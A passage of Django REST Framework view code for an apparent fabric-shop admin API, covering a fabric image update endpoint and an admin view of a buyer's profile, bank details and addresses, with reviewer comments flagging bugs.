                                                                cloth_style_id=request.data['cloth_style'],
                                                                pattern_id=request.data['pattern'],
                                                                image=imageUrl)
                    return Response({'message': addSuccessMessage, "status": "1"}, status=status.HTTP_200_OK)
                else:
                    return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
            else:
                # NOTE(review): misleading message -- this branch means the
                # Authorization header is missing, not the timezone.
                return Response({'status': "0", 'message': 'Timezone is missing!'}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
    except Exception as e:
        print(traceback.format_exc())
        return Response({"message": str(e), "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#######################################################
# api update fabric
#######################################################
@api_view(['POST'])
def Update_Fabric(request):
    """Replace a Fabric's image (admin only).

    POST multipart form: 'fabric_id' and 'image' file, stored under
    fabricimages/<admin id>/.

    Bug fix: when no image file was sent, the original referenced the
    unbound `uploaded_file_url`, raising NameError (500) -- and using an
    empty fallback here would wipe the fabric's existing image.  A missing
    file now returns an explicit error without touching the record.
    """
    try:
        with transaction.atomic():
            API_Key = request.META.get('HTTP_AUTHORIZATION')
            if API_Key is not None:
                try:
                    token = Token.objects.get(key=API_Key)
                    user = token.user
                    checkGroup = user.groups.filter(name='Admin').exists()
                    fabricId = request.data['fabric_id']
                except Exception:
                    return Response({"message": "Session Expired!! Please Login Again", "status": "0"}, status=status.HTTP_401_UNAUTHORIZED)
                if checkGroup:
                    file = request.FILES.get('image')
                    if file is not None:
                        fs = FileSystemStorage()
                        filename = fs.save("fabricimages/" + str(user.id) + "/" + file.name, file)
                        uploaded_file_url = fs.url(filename)
                        Fabric.objects.filter(id=fabricId).update(image=uploaded_file_url)
                        return Response({'message': addSuccessMessage, "status": "1"}, status=status.HTTP_200_OK)
                    # No image supplied: report an error instead of crashing
                    # or clobbering the existing image.
                    return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
                else:
                    return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
            else:
                # NOTE(review): misleading message -- this branch means the
                # Authorization header is missing, not the timezone.
                return Response({'status': "0", 'message': 'Timezone is missing!'}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
    except Exception as e:
        print(traceback.format_exc())
        return Response({"message": str(e), "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
########################################################################
# update add_fabric_colour
########################################################################
############################################################
# Show Profile
############################################################
@api_view(['POST'])
def Show_user_info(request):
    """Show an order's buyer profile to the admin.

    POST body: {"orderId": <OrderPost id>}.  For the order's user, returns
    the (truncated) user record, decrypted bank details, all saved
    addresses, and the shipping address recorded on the order.

    NOTE(review): the response is built and returned inside the per-order
    loop only when the OrderTrn lookup succeeds; if it fails, the loop
    completes without returning and the view returns None (Django error).
    `userserializer` is also unbound when the user lookup fails.  Confirm
    before restructuring -- behaviour is left unchanged here.
    """
    try:
        with transaction.atomic():
            # Authenticate the caller and require membership of the Admin group.
            try:
                api_key = request.META.get('HTTP_AUTHORIZATION')
                token1 = Token.objects.get(key=api_key)
                user = token1.user
                orderId = request.data.get('orderId')
                check_group = user.groups.filter(name='Admin').exists()
                if check_group == False:
                    return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            except:
                print(traceback.format_exc())
                return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            order1 = OrderPost.objects.filter(id = orderId)
            if order1:
                order1serializer = OrderPostSerializer(order1,many=True)
                order_data = order1serializer.data
                for data in order_data:
                    # Buyer's user record, with list-view fields truncated to 30 chars.
                    try:
                        userr = User.objects.get(id=data['user'])
                    except:
                        userr=None
                    if userr is not None:
                        user_detail = UserSerializer(userr)
                        userserializer = user_detail.data
                        userserializer['user_name'] = userserializer['user_name'][:30]
                        userserializer['fullname'] = userserializer['fullname'][:30]
                        userserializer['email'] = userserializer['email'][:30]
                    ####################user bank detail
                    # Decrypt the encrypted bank fields in place.  NOTE(review):
                    # cipher_suite.decrypt returns bytes, which end up in the
                    # JSON payload -- presumably the admin client handles that.
                    try:
                        userr_bank = BankDetail.objects.get(user_id=data['user'])
                    except:
                        userr_bank=None
                    userbankdetail = []
                    if userr_bank is not None:
                        user_bank = BankDetailSerializer(userr_bank)
                        userbankdetail = user_bank.data
                        userbankdetail['Account_name'] = bytes(userbankdetail['Account_name'],'utf-8')
                        userbankdetail['Account_name'] = cipher_suite.decrypt(userbankdetail['Account_name'])
                        userbankdetail['Type'] = bytes(userbankdetail['Type'],'utf-8')
                        userbankdetail['Type'] = cipher_suite.decrypt(userbankdetail['Type'])
                        userbankdetail['routing_number'] = bytes(userbankdetail['routing_number'],'utf-8')
                        userbankdetail['routing_number'] = cipher_suite.decrypt(userbankdetail['routing_number'])
                        userbankdetail['acc_number'] = bytes(userbankdetail['acc_number'],'utf-8')
                        userbankdetail['acc_number'] = cipher_suite.decrypt(userbankdetail['acc_number'])
                    ######################user address
                    # All of the buyer's saved (secondary) addresses.
                    try:
                        user_secondry_address = Addresses.objects.filter(user_id = data['user'])
                    except:
                        user_secondry_address = None
                    useraddresses = []
                    if user_secondry_address is not None:
                        user_addresses = AddressesSerializer(user_secondry_address, many=True)
                        useraddresses = user_addresses.data
                    ######################user address primary
                    # Shipping address actually recorded on this order's transaction.
                    try:
                        user_primary_address = OrderTrn.objects.get(id = data['order'])
                        address_id = user_primary_address.address_id
                        print(address_id)
                    except:
                        user_primary_address = None
                    if user_primary_address is not None:
                        try:
                            primary_address = Addresses.objects.get(id = address_id)
                        except:
                            primary_address = None
                        userprimaryaddress = []
                        if primary_address is not None:
                            user_add_pri = AddressesSerializer(primary_address)
                            userprimaryaddress = user_add_pri.data
                        # Returns on the first order row -- only one response is built.
                        return Response({"message" : addSuccessMessage, "status" : "1", "userr": userserializer,"user_bank":userbankdetail,"addresses":useraddresses,"primary":userprimaryaddress}, status=status.HTTP_201_CREATED)
            else:
                return Response({"message" : "Order Not Found", "status" : "1"}, status=status.HTTP_201_CREATED)
    except Exception:
        print(traceback.format_exc())
        return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.